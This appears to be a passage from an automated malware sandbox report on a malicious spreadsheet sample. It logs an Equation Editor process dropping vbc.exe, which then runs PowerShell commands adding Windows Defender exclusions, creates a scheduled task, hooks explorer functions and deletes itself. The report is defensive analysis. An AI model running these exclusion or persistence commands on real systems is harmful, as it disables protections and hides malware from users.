          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp4D08.tmp'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp4D08.tmp'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Binary string: dows\System.Management.Automation.pdbpdbion.pdbn\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbExplorer.Default -extoff source: powershell.exe, 00000005.00000002.2148838575.0000000000614000.00000004.00000020.sdmp
          Source: Binary string: System.Management.Automation.pdb:Z source: powershell.exe, 00000007.00000002.2161752463.000000000630D000.00000004.00000001.sdmp
          Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdb< source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, cmmon32.exe
          Source: Binary string: System.Management.Automation.pdb' source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\System.Management.Automation.pdb] source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2153198993.0000000002970000.00000002.00000001.sdmp
          Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2153352139.0000000002B86000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2154314786.00000000028F6000.00000004.00000040.sdmp
          Source: Refno.191938.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Refno.191938.xlsxInitial sample: OLE indicators encrypted = True
          Source: ohms[1].exe.2.drStatic PE information: 0xDA32965F [Tue Jan 1 18:33:03 2086 UTC]
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00321F81 pushfd ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_027711A3 push 8DC2110Fh; retn 568Dh
          Source: C:\Users\Public\vbc.exeCode function: 13_2_0041D0D2 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 13_2_0041D0DB push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 13_2_0041D085 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 13_2_0041D13C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 13_2_0041D9B9 push ss; ret
          Source: C:\Users\Public\vbc.exeCode function: 13_2_0040E29B pushfd ; retf
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00404443 push cs; ret
          Source: C:\Users\Public\vbc.exeCode function: 13_2_0041E586 push esp; ret
          Source: C:\Users\Public\vbc.exeCode function: 13_2_00C7DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_01FBDFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_000DD085 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_000DD0DB push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_000DD0D2 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_000DD13C push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_000CE29B pushfd ; retf
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_000C4443 push cs; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_000DE586 push esp; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 15_2_000DD9B9 push ss; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.5188778941
          Source: initial sampleStatic PE information: section name: .text entropy: 7.5188778941
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ohms[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp4D08.tmp'

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xEA
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
